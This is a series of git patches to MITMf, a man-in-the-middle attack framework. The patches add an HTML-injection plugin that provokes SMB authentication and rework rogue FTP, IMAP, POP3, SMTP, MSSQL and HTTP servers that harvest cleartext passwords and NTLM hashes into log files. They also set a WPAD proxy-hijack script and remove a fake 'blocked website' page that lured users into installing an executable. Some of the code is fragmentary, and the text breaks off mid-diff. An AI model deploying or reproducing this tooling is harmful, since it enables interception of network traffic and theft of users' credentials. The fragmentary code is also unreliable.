b/plugins/SMBAuth.py @@ -0,0 +1,42 @@ +#!/usr/bin/env python2.7 + +# Copyright (c) 2014-2016 Marcello Salvati +# +# This program is free software; you can redistribute it and/or +# modify it under the terms of the GNU General Public License as +# published by the Free Software Foundation; either version 3 of the +# License, or (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, but +# WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU +# General Public License for more details. 
+# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 +# USA +# + +from core.utils import SystemConfig +from plugins.plugin import Plugin +from plugins.Inject import Inject + +class SMBAuth(Inject, Plugin): + name = "SMBAuth" + optname = "smbauth" + desc = "Evoke SMB challenge-response auth attempts" + depends = ["Inject"] + version = "0.1" + has_opts = False + + def initialize(self, options): + Inject.initialize(self, options) + self.target_ip = SystemConfig.getIP(options.interface) + + self.html_payload = self._get_data() + + def _get_data(self): + return ''\ + ''\ + '' % tuple([self.target_ip]*3) From dfa9c9d65edb1d4bc3cb0687632b55225e6da1b6 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Tue, 5 May 2015 00:39:59 +0200 Subject: [PATCH 09/20] Added debug logging to ProxyPlugins, it will now print a traceback if errors occur in hooked functions --- core/sergioproxy/ProxyPlugins.py | 11 ++++++++++- core/sslstrip/ServerConnection.py | 2 +- plugins/Inject.py | 2 ++ plugins/Upsidedownternet.py | 1 + 4 files changed, 14 insertions(+), 2 deletions(-) diff --git a/core/sergioproxy/ProxyPlugins.py b/core/sergioproxy/ProxyPlugins.py index c58cc8d..a182326 100644 --- a/core/sergioproxy/ProxyPlugins.py +++ b/core/sergioproxy/ProxyPlugins.py @@ -19,6 +19,7 @@ import sys import logging import inspect +import traceback mitmf_logger = logging.getLogger("mitmf") @@ -59,9 +60,12 @@ class ProxyPlugins: for p in plugins: self.addPlugin(p) + mitmf_logger.debug("[ProxyPlugins] Loaded {} plugin/s".format(len(self.plist))) + def addPlugin(self,p): '''Load a plugin''' self.plist.append(p) + mitmf_logger.debug("[ProxyPlugins] Adding {} plugin".format(p.name)) for mthd in p.implements: try: self.pmthds[mthd].append(getattr(p,mthd)) @@ -71,6 +75,7 @@ class ProxyPlugins: def removePlugin(self,p): '''Unload a plugin''' self.plist.remove(p) + mitmf_logger.debug("[ProxyPlugins] Removing {} plugin".format(p.name)) for mthd in p.implements: self.pmthds[mthd].remove(p) @@ -95,8 +100,12 @@ class ProxyPlugins: for f in self.pmthds[fname]: a = f(**args) if a != None: args = a - except KeyError: + except KeyError as e: pass + except Exception as e: + #This is needed because errors in hooked functions won't raise an Exception + Tracback (which can be infuriating) + mitmf_logger.error("[ProxyPlugins] Exception occurred in hooked function") + traceback.print_exc() #pass our changes to the locals back down return args diff --git a/core/sslstrip/ServerConnection.py b/core/sslstrip/ServerConnection.py index 3c53eb6..3aadfc5 100644 --- a/core/sslstrip/ServerConnection.py +++ b/core/sslstrip/ServerConnection.py @@ -189,7 +189,7 @@ class ServerConnection(HTTPClient): self.client.setHeader('Content-Length', len(data)) try: - self.client.write(data) #Gets rid of some generic errors + self.client.write(data) except: pass diff --git a/plugins/Inject.py b/plugins/Inject.py index ccad52d..2b75e37 100644 --- a/plugins/Inject.py +++ b/plugins/Inject.py @@ -28,6 +28,8 @@ from core.utils import SystemConfig from plugins.plugin import Plugin from plugins.CacheKill import CacheKill +mitmf_logger = logging.getLogger("mitmf") + class Inject(CacheKill, Plugin): name = "Inject" optname = "inject" diff --git a/plugins/Upsidedownternet.py b/plugins/Upsidedownternet.py index 402c9e5..f14778e 100644 --- a/plugins/Upsidedownternet.py +++ b/plugins/Upsidedownternet.py @@ -66,4 +66,5 @@ class 
Upsidedownternet(Plugin): mitmf_logger.info("{} Flipped image".format(request.client.getClientIP())) except Exception as e: mitmf_logger.info("{} Error: {}".format(request.client.getClientIP(), e)) + return {'request': request, 'data': data} From 70ec5a2bbcb1269389123b58366bb702a2df2265 Mon Sep 17 00:00:00 2001 From: byt3bl33d3r Date: Tue, 5 May 2015 19:04:01 +0200 Subject: [PATCH 10/20] All plugins are now modified to support dynamic config file changes Responder functionality fully restored --- config/mitmf.conf | 46 +- config/responder/Denied.html | 31 - config/responder/FixInternet.exe | Bin 25113 -> 0 bytes .../responder/certs/gen-self-signed-cert.sh | 2 - config/responder/certs/responder.crt | 19 - config/responder/certs/responder.key | 27 - core/configwatcher.py | 4 +- core/dnschef/DNSchef.py | 1 + core/netcreds/NetCreds.py | 2 + core/protocols/http/HTTPProxy.py | 240 ------- core/protocols/mssql/MSSQLServer.py | 128 ---- core/protocols/pop3/POP3Server.py | 69 -- core/protocols/smb/SMBserver.py | 8 +- core/protocols/smtp/SMTPServer.py | 63 -- core/responder/common.py | 2 +- .../{protocols => responder}/ftp/FTPServer.py | 48 +- core/{protocols => responder}/ftp/__init__.py | 0 .../http => responder/https}/HTTPSProxy.py | 0 .../http => responder/https}/__init__.py | 0 .../imap/IMAPPackets.py | 17 +- .../imap/IMAPServer.py | 39 +- .../{protocols => responder}/imap/__init__.py | 0 .../ldap/LDAPPackets.py | 18 +- .../ldap/LDAPServer.py | 52 +- .../{protocols => responder}/ldap/__init__.py | 0 .../mssql/MSSQLPackets.py | 17 +- core/responder/mssql/MSSQLServer.py | 127 ++++ .../mssql/__init__.py | 0 core/responder/pop3/POP3Server.py | 63 ++ .../{protocols => responder}/pop3/__init__.py | 0 .../smtp/SMTPPackets.py | 17 +- core/responder/smtp/SMTPServer.py | 62 ++ .../{protocols => responder}/smtp/__init__.py | 0 core/sergioproxy/ProxyPlugins.py | 2 +- core/sslstrip/ServerConnection.py | 2 +- libs/bdfactory | 2 +- mitmf.py | 9 +- plugins/AppCachePoison.py | 206 ++++++ plugins/BeefAutorun.py | 127 ++++ plugins/BrowserProfiler.py | 129 ++++ plugins/FilePwn.py | 650 ++++++++++++++++++ plugins/Inject.py | 55 +- plugins/JavaPwn.py | 231 +++++++ plugins/JsKeylogger.py | 4 +- plugins/Replace.py | 105 +++ plugins/Responder.py | 34 +- plugins/SSLstrip+.py | 51 ++ plugins/SessionHijacker.py | 187 +++++ plugins/Spoof.py | 2 - plugins/Upsidedownternet.py | 2 + 50 files changed, 2102 insertions(+), 798 deletions(-) delete mode 100644 config/responder/Denied.html delete mode 100755 config/responder/FixInternet.exe delete mode 100755 config/responder/certs/gen-self-signed-cert.sh delete mode 100644 config/responder/certs/responder.crt delete mode 100644 config/responder/certs/responder.key delete mode 100644 core/protocols/http/HTTPProxy.py delete mode 100644 core/protocols/mssql/MSSQLServer.py delete mode 100644 core/protocols/pop3/POP3Server.py delete mode 100644 core/protocols/smtp/SMTPServer.py rename core/{protocols => responder}/ftp/FTPServer.py (54%) rename core/{protocols => responder}/ftp/__init__.py (100%) rename core/{protocols/http => responder/https}/HTTPSProxy.py (100%) rename core/{protocols/http => responder/https}/__init__.py (100%) rename core/{protocols => responder}/imap/IMAPPackets.py (76%) rename core/{protocols => responder}/imap/IMAPServer.py (50%) rename core/{protocols => responder}/imap/__init__.py (100%) rename core/{protocols => responder}/ldap/LDAPPackets.py (97%) rename core/{protocols => responder}/ldap/LDAPServer.py (72%) rename core/{protocols => 
responder}/ldap/__init__.py (100%) rename core/{protocols => responder}/mssql/MSSQLPackets.py (96%) create mode 100644 core/responder/mssql/MSSQLServer.py rename core/{protocols => responder}/mssql/__init__.py (100%) create mode 100644 core/responder/pop3/POP3Server.py rename core/{protocols => responder}/pop3/__init__.py (100%) rename core/{protocols => responder}/smtp/SMTPPackets.py (81%) create mode 100644 core/responder/smtp/SMTPServer.py rename core/{protocols => responder}/smtp/__init__.py (100%) create mode 100644 plugins/AppCachePoison.py create mode 100644 plugins/BeefAutorun.py create mode 100644 plugins/BrowserProfiler.py create mode 100644 plugins/FilePwn.py create mode 100644 plugins/JavaPwn.py create mode 100644 plugins/Replace.py create mode 100644 plugins/SSLstrip+.py create mode 100644 plugins/SessionHijacker.py diff --git a/config/mitmf.conf b/config/mitmf.conf index 04bd575..c76f951 100644 --- a/config/mitmf.conf +++ b/config/mitmf.conf @@ -21,6 +21,10 @@ msfport = 8080 #Port to start webserver for exploits rpcip = 127.0.0.1 rpcpass = abc123 + + [[SMB]] + #Set a custom challenge + Challenge = 1122334455667788 [[DNS]] @@ -88,46 +92,32 @@ [Responder] #Set these values to On or Off, so you can control which rogue authentication server is turned on. - SQL = On - SMB = On + MSSQL = On Kerberos = On - FTP = On - POP = On - ##Listen on 25/TCP, 587/TCP - SMTP = On - IMAP = On - HTTP = On - HTTPS = On - LDAP = On + FTP = On + POP = On + SMTP = On #Listens on 25/TCP, 587/TCP + IMAP = On + LDAP = On - #Set a custom challenge - Challenge = 1122334455667788 - - #Set this to change the default logging file - SessionLog = Responder-Session.log - - #Set this option with your in-scope targets (default = All). Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119 - #RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119 + #Set this option with your in-scope targets (default = All) + #Ex. RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119 RespondTo = - #Set this option with specific NBT-NS/LLMNR names to answer to (default = All). Example: RespondTo = WPAD,DEV,PROD,SQLINT - #RespondTo = WPAD,DEV,PROD,SQLINT + + #Set this option with specific NBT-NS/LLMNR names to answer to (default = All) + #Ex. RespondTo = WPAD,DEV,PROD,SQLINT RespondToName = #DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119 DontRespondTo = - #Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS + + #Set this option with specific NBT-NS/LLMNR names not to respond to (default = None) + #Ex. DontRespondTo = NAC, IPS, IDS DontRespondToName = #Set your custom PAC script WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return "PROXY ISAProxySrv:3141; DIRECT";}' - [[HTTPS Server]] - - #Change to use your certs - cert = config/responder/certs/responder.crt - key = config/responder/certs/responder.key - - [BeEFAutorun] #Example config for the BeefAutorun plugin diff --git a/config/responder/Denied.html b/config/responder/Denied.html deleted file mode 100644 index d79f811..0000000 --- a/config/responder/Denied.html +++ /dev/null @@ -1,31 +0,0 @@ - - -Website Blocked: ISA Proxy Server - - - - -
- New Security Policy: Website Blocked
-   • Access has been blocked. Please download and install the new Proxy Client in order to access internet resources.
diff --git a/config/responder/FixInternet.exe b/config/responder/FixInternet.exe
deleted file mode 100755
index b1a8e630176e120fc0f4f7af483880fb419d4937..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001
literal 25113
[base85-encoded binary delta omitted]

diff --git a/core/protocols/http/HTTPProxy.py b/core/protocols/http/HTTPProxy.py
deleted file mode 100644
- NthashLen = 64
- DomainLen = struct.unpack('
- PostData = '[+]The HTTP POST DATA in this request was: %s'%(''.join(POSTDATA).strip())
- #print PostData
- responder_logger.info(PostData)
-#Handle HTTP packet sequence.
-def PacketSequence(data,client): - Ntlm = re.findall('(?<=Authorization: NTLM )[^\\r]*', data) - BasicAuth = re.findall('(?<=Authorization: Basic )[^\\r]*', data) - - if ServeEXEOrNot(Exe_On_Off) and re.findall('.exe', data): - File = config.get('HTTP Server', 'ExecFilename') - buffer1 = ServerExeFile(Payload = ServeEXE(data,client,File),filename=File) - buffer1.calculate() - return str(buffer1) - - if ServeEXECAlwaysOrNot(Exec_Mode_On_Off): - if IsExecutable(FILENAME): - buffer1 = ServeAlwaysExeFile(Payload = ServeEXE(data,client,FILENAME),ContentDiFile=FILENAME) - buffer1.calculate() - return str(buffer1) - else: - buffer1 = ServeAlwaysNormalFile(Payload = ServeEXE(data,client,FILENAME)) - buffer1.calculate() - return str(buffer1) - - if Ntlm: - packetNtlm = b64decode(''.join(Ntlm))[8:9] - if packetNtlm == "\x01": - GrabURL(data,client) - GrabCookie(data,client) - r = NTLM_Challenge(ServerChallenge=Challenge) - r.calculate() - t = IIS_NTLM_Challenge_Ans() - t.calculate(str(r)) - buffer1 = str(t) - return buffer1 - if packetNtlm == "\x03": - NTLM_Auth= b64decode(''.join(Ntlm)) - ParseHTTPHash(NTLM_Auth,client) - if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client): - Message = "[+]WPAD (auth) file sent to: %s"%(client) - if Verbose: - print Message - responder_logger.info(Message) - buffer1 = WpadCustom(data,client) - return buffer1 - else: - buffer1 = IIS_Auth_Granted(Payload=HTMLToServe) - buffer1.calculate() - return str(buffer1) - - if BasicAuth: - GrabCookie(data,client) - GrabURL(data,client) - outfile = "./logs/responder/HTTP-Clear-Text-Password-"+client+".txt" - WriteData(outfile,b64decode(''.join(BasicAuth)), b64decode(''.join(BasicAuth))) - responder_logger.info('[+]HTTP-User & Password: %s'%(b64decode(''.join(BasicAuth)))) - if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client): - Message = "[+]WPAD (auth) file sent to: %s"%(client) - if Verbose: - print Message - responder_logger.info(Message) - buffer1 = WpadCustom(data,client) - return buffer1 - else: - buffer1 = IIS_Auth_Granted(Payload=HTMLToServe) - buffer1.calculate() - return str(buffer1) - - else: - return str(Basic_Ntlm(Basic)) - -#HTTP Server Class -class HTTP(BaseRequestHandler): - - def handle(self): - try: - while True: - self.request.settimeout(1) - data = self.request.recv(8092) - buff = WpadCustom(data,self.client_address[0]) - if buff and WpadForcedAuth(Force_WPAD_Auth) == False: - Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0]) - if Verbose: - print Message - responder_logger.info(Message) - self.request.send(buff) - else: - buffer0 = PacketSequence(data,self.client_address[0]) - self.request.send(buffer0) - except Exception: - pass#No need to be verbose.. 
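The rogue servers in this series (the deleted HTTP module above, and the LDAP/MSSQL modules that replace it under core/responder/) all recover the NTLM credentials by slicing fixed offsets out of the NTLMSSP blob with struct.unpack. A minimal, self-contained sketch of that parsing; the function name and the choice to read the full 4-byte offset fields are my own, and the layout follows MS-NLMP rather than the project's exact slices:

```python
import struct

def parse_ntlmssp_auth(data):
    """Pick apart an NTLMSSP AUTHENTICATE (type 3) message.

    Each field descriptor is 8 bytes: length (2), max length (2), offset (4),
    all little-endian, relative to the start of the blob (MS-NLMP 2.2.1.3).
    """
    if data[:8] != "NTLMSSP\x00":
        raise ValueError("not an NTLMSSP message")

    def field(pos):
        length, _maxlen, offset = struct.unpack("<HHI", data[pos:pos + 8])
        return data[offset:offset + length]

    lm_response = field(12)
    nt_response = field(20)
    domain      = field(28).decode("utf-16-le")
    user        = field(36).decode("utf-16-le")

    # NTLMv1 responses are exactly 24 bytes; anything longer is NTLMv2.
    version = "NTLMv2" if len(nt_response) > 24 else "NTLMv1"
    return user, domain, lm_response, nt_response, version
```

A 24-byte NtChallengeResponse marks an NTLMv1 capture, which is the same check the original ParseHTTPHash/ParseSQLHash code makes before switching to its NTLMv2 branch.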
- \ No newline at end of file diff --git a/core/protocols/mssql/MSSQLServer.py b/core/protocols/mssql/MSSQLServer.py deleted file mode 100644 index 60d7adb..0000000 --- a/core/protocols/mssql/MSSQLServer.py +++ /dev/null @@ -1,128 +0,0 @@ -import struct - -class MSSQLServer(): - - def serve_thread_tcp(host, port, handler): - try: - server = ThreadingTCPServer((host, port), handler) - server.serve_forever() - except Exception, e: - print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) - - def start(SQL_On_Off): - if SQL_On_Off == "ON": - t = threading.Thread(name="MSSQL", target=self.serve_thread_tcp, args=("0.0.0.0", 1433,MSSQL)) - t.setDaemon(True) - t.start() - return t - if SQL_On_Off == "OFF": - return False - -class ThreadingTCPServer(ThreadingMixIn, TCPServer): - - allow_reuse_address = True - - def server_bind(self): - TCPServer.server_bind(self) - -#This function parse SQL NTLMv1/v2 hash and dump it into a specific file. -def ParseSQLHash(data,client): - SSPIStart = data[8:] - LMhashLen = struct.unpack(' 60: - DomainLen = struct.unpack('H',Data[2:4])[0] - EncryptionValue = Data[PacketLen-7:PacketLen-6] - if re.search("NTLMSSP",Data): - return True - else: - return False - -#MS-SQL server class. -class MSSQL(BaseRequestHandler): - - def handle(self): - try: - while True: - data = self.request.recv(1024) - self.request.settimeout(0.1) - ##Pre-Login Message - if data[0] == "\x12": - buffer0 = str(MSSQLPreLoginAnswer()) - self.request.send(buffer0) - data = self.request.recv(1024) - ##NegoSSP - if data[0] == "\x10": - if re.search("NTLMSSP",data): - t = MSSQLNTLMChallengeAnswer(ServerChallenge=Challenge) - t.calculate() - buffer1 = str(t) - self.request.send(buffer1) - data = self.request.recv(1024) - else: - ParseClearTextSQLPass(data,self.client_address[0]) - ##NegoSSP Auth - if data[0] == "\x11": - ParseSQLHash(data,self.client_address[0]) - except Exception: - pass - self.request.close() -################################################################################## -#SQL Stuff ends here -################################################################################## \ No newline at end of file diff --git a/core/protocols/pop3/POP3Server.py b/core/protocols/pop3/POP3Server.py deleted file mode 100644 index 8e7d700..0000000 --- a/core/protocols/pop3/POP3Server.py +++ /dev/null @@ -1,69 +0,0 @@ -################################################################################## -#POP3 Stuff starts here -################################################################################## - -class POP3Server(): - - def serve_thread_tcp(host, port, handler): - try: - server = ThreadingTCPServer((host, port), handler) - server.serve_forever() - except Exception, e: - print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) - - #Function name self-explanatory - def start(POP_On_Off): - if POP_On_Off == "ON": - t = threading.Thread(name="POP", target=serve_thread_tcp, args=("0.0.0.0", 110,POP)) - t.setDaemon(True) - t.start() - return t - if POP_On_Off == "OFF": - return False - -class ThreadingTCPServer(ThreadingMixIn, TCPServer): - - allow_reuse_address = 1 - - def server_bind(self): - TCPServer.server_bind(self) - - -class POPOKPacket(Packet): - fields = OrderedDict([ - ("Code", "+OK"), - ("CRLF", "\r\n"), - ]) - -#POP3 server class. 
-class POP(BaseRequestHandler): - - def handle(self): - try: - self.request.send(str(POPOKPacket())) - data = self.request.recv(1024) - if data[0:4] == "USER": - User = data[5:].replace("\r\n","") - responder_logger.info('[+]POP3 User: %s'%(User)) - t = POPOKPacket() - self.request.send(str(t)) - data = self.request.recv(1024) - if data[0:4] == "PASS": - Pass = data[5:].replace("\r\n","") - Outfile = "./logs/responder/POP3-Clear-Text-Password-"+self.client_address[0]+".txt" - WriteData(Outfile,User+":"+Pass, User+":"+Pass) - #print "[+]POP3 Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],User,Pass) - responder_logger.info("[+]POP3 Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],User,Pass)) - t = POPOKPacket() - self.request.send(str(t)) - data = self.request.recv(1024) - else : - t = POPOKPacket() - self.request.send(str(t)) - data = self.request.recv(1024) - except Exception: - pass - -################################################################################## -#POP3 Stuff ends here -################################################################################## \ No newline at end of file diff --git a/core/protocols/smb/SMBserver.py b/core/protocols/smb/SMBserver.py index 57c5cb3..ded9958 100644 --- a/core/protocols/smb/SMBserver.py +++ b/core/protocols/smb/SMBserver.py @@ -1,7 +1,8 @@ import logging import sys import threading -from impacket import smbserver, LOG +from impacket import version, smbserver, LOG +from core.configwatcher import ConfigWatcher LOG.setLevel(logging.INFO) LOG.propagate = False @@ -16,11 +17,14 @@ streamHandler.setFormatter(formatter) LOG.addHandler(fileHandler) LOG.addHandler(streamHandler) -class SMBserver: +class SMBserver(ConfigWatcher): + + impacket_ver = version.VER_MINOR def __init__(self, listenAddress = '0.0.0.0', listenPort=445, configFile=''): self.server = smbserver.SimpleSMBServer(listenAddress, listenPort, configFile) + self.server.setSMBChallenge(self.config["MITMf"]["SMB"]["Challenge"]) def start(self): t = threading.Thread(name='SMBserver', target=self.server.start) diff --git a/core/protocols/smtp/SMTPServer.py b/core/protocols/smtp/SMTPServer.py deleted file mode 100644 index 50002f9..0000000 --- a/core/protocols/smtp/SMTPServer.py +++ /dev/null @@ -1,63 +0,0 @@ -################################################################################## -#ESMTP Stuff starts here -################################################################################## - -class SMTP(): - - def serve_thread_tcp(self, host, port, handler): - try: - server = ThreadingTCPServer((host, port), handler) - server.serve_forever() - except Exception, e: - print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) - - #Function name self-explanatory - def start(self, SMTP_On_Off): - if SMTP_On_Off == "ON": - t1 = threading.Thread(name="ESMTP-25", target=self.serve_thread_tcp, args=("0.0.0.0", 25,ESMTP)) - t2 = threading.Thread(name="ESMTP-587", target=self.serve_thread_tcp, args=("0.0.0.0", 587,ESMTP)) - - for t in [t1, t2]: - t.setDaemon(True) - t.start() - - if SMTP_On_Off == "OFF": - return False - -class ThreadingTCPServer(ThreadingMixIn, TCPServer): - - allow_reuse_address = 1 - - def server_bind(self): - TCPServer.server_bind(self) - -#ESMTP server class. 
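The SMBserver change earlier in this patch wires the new [[SMB]] Challenge setting into impacket's SimpleSMBServer through setSMBChallenge(), so captured NTLM responses are computed against a known 8-byte challenge. A rough standalone sketch of that wiring; the helper name and argument defaults are illustrative, the impacket calls are the ones used above:

```python
import threading
from impacket import smbserver

def start_rogue_smb(config_file, challenge="1122334455667788", port=445):
    """Run impacket's SimpleSMBServer in a background thread with a fixed
    NTLM challenge, so captured hashes can be attacked against a known value."""
    server = smbserver.SimpleSMBServer("0.0.0.0", port, config_file)
    server.setSMBChallenge(challenge)

    t = threading.Thread(name="SMBserver", target=server.start)
    t.setDaemon(True)  # don't keep the main process alive just for this thread
    t.start()
    return t
```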
-class ESMTP(BaseRequestHandler): - - def handle(self): - try: - self.request.send(str(SMTPGreating())) - data = self.request.recv(1024) - if data[0:4] == "EHLO": - self.request.send(str(SMTPAUTH())) - data = self.request.recv(1024) - if data[0:4] == "AUTH": - self.request.send(str(SMTPAUTH1())) - data = self.request.recv(1024) - if data: - Username = b64decode(data[:len(data)-2]) - self.request.send(str(SMTPAUTH2())) - data = self.request.recv(1024) - if data: - Password = b64decode(data[:len(data)-2]) - Outfile = "./logs/responder/SMTP-Clear-Text-Password-"+self.client_address[0]+".txt" - WriteData(Outfile,Username+":"+Password, Username+":"+Password) - #print "[+]SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password) - responder_logger.info("[+]SMTP Credentials from %s. User/Pass: %s:%s "%(self.client_address[0],Username,Password)) - - except Exception: - pass - -################################################################################## -#ESMTP Stuff ends here -################################################################################## \ No newline at end of file diff --git a/core/responder/common.py b/core/responder/common.py index cd0ea40..904d865 100644 --- a/core/responder/common.py +++ b/core/responder/common.py @@ -1,6 +1,6 @@ #common functions that are used throughout the Responder's code - +import os import re #Function used to write captured hashs to a file. diff --git a/core/protocols/ftp/FTPServer.py b/core/responder/ftp/FTPServer.py similarity index 54% rename from core/protocols/ftp/FTPServer.py rename to core/responder/ftp/FTPServer.py index 98d65ae..d045568 100644 --- a/core/protocols/ftp/FTPServer.py +++ b/core/responder/ftp/FTPServer.py @@ -1,25 +1,25 @@ -################################################################################## -#FTP Stuff starts here -################################################################################## +import socket +import threading +import logging + +from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler +from core.responder.packet import Packet +from core.responder.odict import OrderedDict +from core.responder.common import * + +mitmf_logger = logging.getLogger("mitmf") class FTPServer(): - - def serve_thread_tcp(host, port, handler): + + def start(self): try: - server = ThreadingTCPServer((host, port), handler) - server.serve_forever() - except Exception, e: - print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) - - #Function name self-explanatory - def start(FTP_On_Off): - if FTP_On_Off == "ON": - t = threading.Thread(name="FTP", target=self.serve_thread_tcp, args=("0.0.0.0", 21, FTP)) + mitmf_logger.debug("[FTPServer] online") + server = ThreadingTCPServer(("0.0.0.0", 21), FTP) + t = threading.Thread(name="FTPServer", target=server.serve_forever) t.setDaemon(True) t.start() - - if FTP_On_Off == "OFF": - return False + except Exception, e: + mitmf_logger.error("[FTPServer] Error starting on port {}: {}".format(21, e)) class ThreadingTCPServer(ThreadingMixIn, TCPServer): @@ -45,8 +45,7 @@ class FTP(BaseRequestHandler): data = self.request.recv(1024) if data[0:4] == "USER": User = data[5:].replace("\r\n","") - #print "[+]FTP User: ", User - responder_logger.info('[+]FTP User: %s'%(User)) + mitmf_logger.info('[FTPServer] {} FTP User: {}'.format(self.client_address[0], User)) t = FTPPacket(Code="331",Message="User name okay, need password.") self.request.send(str(t)) data = self.request.recv(1024) @@ -54,8 +53,7 @@ class FTP(BaseRequestHandler): 
Pass = data[5:].replace("\r\n","") Outfile = "./logs/responder/FTP-Clear-Text-Password-"+self.client_address[0]+".txt" WriteData(Outfile,User+":"+Pass, User+":"+Pass) - #print "[+]FTP Password is: ", Pass - responder_logger.info('[+]FTP Password is: %s'%(Pass)) + mitmf_logger.info('[FTPServer] {} FTP Password is: {}'.format(self.client_address[0], Pass)) t = FTPPacket(Code="530",Message="User not logged in.") self.request.send(str(t)) data = self.request.recv(1024) @@ -63,9 +61,5 @@ class FTP(BaseRequestHandler): t = FTPPacket(Code="502",Message="Command not implemented.") self.request.send(str(t)) data = self.request.recv(1024) - except Exception: - pass - -################################################################################## -#FTP Stuff ends here -################################################################################## \ No newline at end of file + except Exception as e: + mitmf_logger.error("[FTPServer] Error handling request: {}".format(e)) \ No newline at end of file diff --git a/core/protocols/ftp/__init__.py b/core/responder/ftp/__init__.py similarity index 100% rename from core/protocols/ftp/__init__.py rename to core/responder/ftp/__init__.py diff --git a/core/protocols/http/HTTPSProxy.py b/core/responder/https/HTTPSProxy.py similarity index 100% rename from core/protocols/http/HTTPSProxy.py rename to core/responder/https/HTTPSProxy.py diff --git a/core/protocols/http/__init__.py b/core/responder/https/__init__.py similarity index 100% rename from core/protocols/http/__init__.py rename to core/responder/https/__init__.py diff --git a/core/protocols/imap/IMAPPackets.py b/core/responder/imap/IMAPPackets.py similarity index 76% rename from core/protocols/imap/IMAPPackets.py rename to core/responder/imap/IMAPPackets.py index 51f13e8..3e3ed17 100644 --- a/core/protocols/imap/IMAPPackets.py +++ b/core/responder/imap/IMAPPackets.py @@ -16,21 +16,8 @@ # You should have received a copy of the GNU General Public License # along with this program. If not, see . 
import struct -from odict import OrderedDict - -class Packet(): - fields = OrderedDict([ - ("data", ""), - ]) - def __init__(self, **kw): - self.fields = OrderedDict(self.__class__.fields) - for k,v in kw.items(): - if callable(v): - self.fields[k] = v(self.fields[k]) - else: - self.fields[k] = v - def __str__(self): - return "".join(map(str, self.fields.values())) +from core.responder.odict import OrderedDict +from core.responder.packet import Packet #IMAP4 Greating class class IMAPGreating(Packet): diff --git a/core/protocols/imap/IMAPServer.py b/core/responder/imap/IMAPServer.py similarity index 50% rename from core/protocols/imap/IMAPServer.py rename to core/responder/imap/IMAPServer.py index a05afc6..67e6a55 100644 --- a/core/protocols/imap/IMAPServer.py +++ b/core/responder/imap/IMAPServer.py @@ -1,26 +1,23 @@ -################################################################################## -#IMAP4 Stuff starts here -################################################################################## +import logging +import threading +from SocketServer import TCPServer, ThreadingMixIn, BaseRequestHandler +from IMAPPackets import * +from core.responder.common import * + +mitmf_logger = logging.getLogger("mitmf") class IMAPServer(): - def serve_thread_tcp(host, port, handler): + def start(self): try: - server = ThreadingTCPServer((host, port), handler) - server.serve_forever() - except Exception, e: - print "Error starting TCP server on port %s: %s:" % (str(port),str(e)) - - #Function name self-explanatory - def start(IMAP_On_Off): - if IMAP_On_Off == "ON": - t = threading.Thread(name="IMAP", target=self.serve_thread_tcp, args=("0.0.0.0", 143,IMAP)) + mitmf_logger.debug("[IMAPServer] online") + server = ThreadingTCPServer(("0.0.0.0", 143), IMAP) + t = threading.Thread(name="IMAPServer", target=server.serve_forever) t.setDaemon(True) t.start() - - if IMAP_On_Off == "OFF": - return False + except Exception, e: + mitmf_logger.error("[IMAPServer] Error starting on port {}: {}".format(143, e)) class ThreadingTCPServer(ThreadingMixIn, TCPServer): @@ -46,13 +43,9 @@ class IMAP(BaseRequestHandler): Outfile = "./logs/responder/IMAP-Clear-Text-Password-"+self.client_address[0]+".txt" WriteData(Outfile,Credentials, Credentials) #print '[+]IMAP Credentials from %s. ("User" "Pass"): %s'%(self.client_address[0],Credentials) - responder_logger.info('[+]IMAP Credentials from %s. ("User" "Pass"): %s'%(self.client_address[0],Credentials)) + mitmf_logger.info('[IMAPServer] IMAP Credentials from {}. 
("User" "Pass"): {}'.format(self.client_address[0],Credentials)) self.request.send(str(ditchthisconnection())) data = self.request.recv(1024) - except Exception: - pass - -################################################################################## -#IMAP4 Stuff ends here -################################################################################## \ No newline at end of file + except Exception as e: + mitmf_logger.error("[IMAPServer] Error handling request: {}".format(e)) diff --git a/core/protocols/imap/__init__.py b/core/responder/imap/__init__.py similarity index 100% rename from core/protocols/imap/__init__.py rename to core/responder/imap/__init__.py diff --git a/core/protocols/ldap/LDAPPackets.py b/core/responder/ldap/LDAPPackets.py similarity index 97% rename from core/protocols/ldap/LDAPPackets.py rename to core/responder/ldap/LDAPPackets.py index 7de4409..ce3b64f 100644 --- a/core/protocols/ldap/LDAPPackets.py +++ b/core/responder/ldap/LDAPPackets.py @@ -17,22 +17,8 @@ # along with this program. If not, see . import struct -from odict import OrderedDict - -class Packet(): - fields = OrderedDict([ - ("data", ""), - ]) - def __init__(self, **kw): - self.fields = OrderedDict(self.__class__.fields) - for k,v in kw.items(): - if callable(v): - self.fields[k] = v(self.fields[k]) - else: - self.fields[k] = v - def __str__(self): - return "".join(map(str, self.fields.values())) - +from core.responder.odict import OrderedDict +from core.responder.packet import Packet class LDAPSearchDefaultPacket(Packet): fields = OrderedDict([ diff --git a/core/protocols/ldap/LDAPServer.py 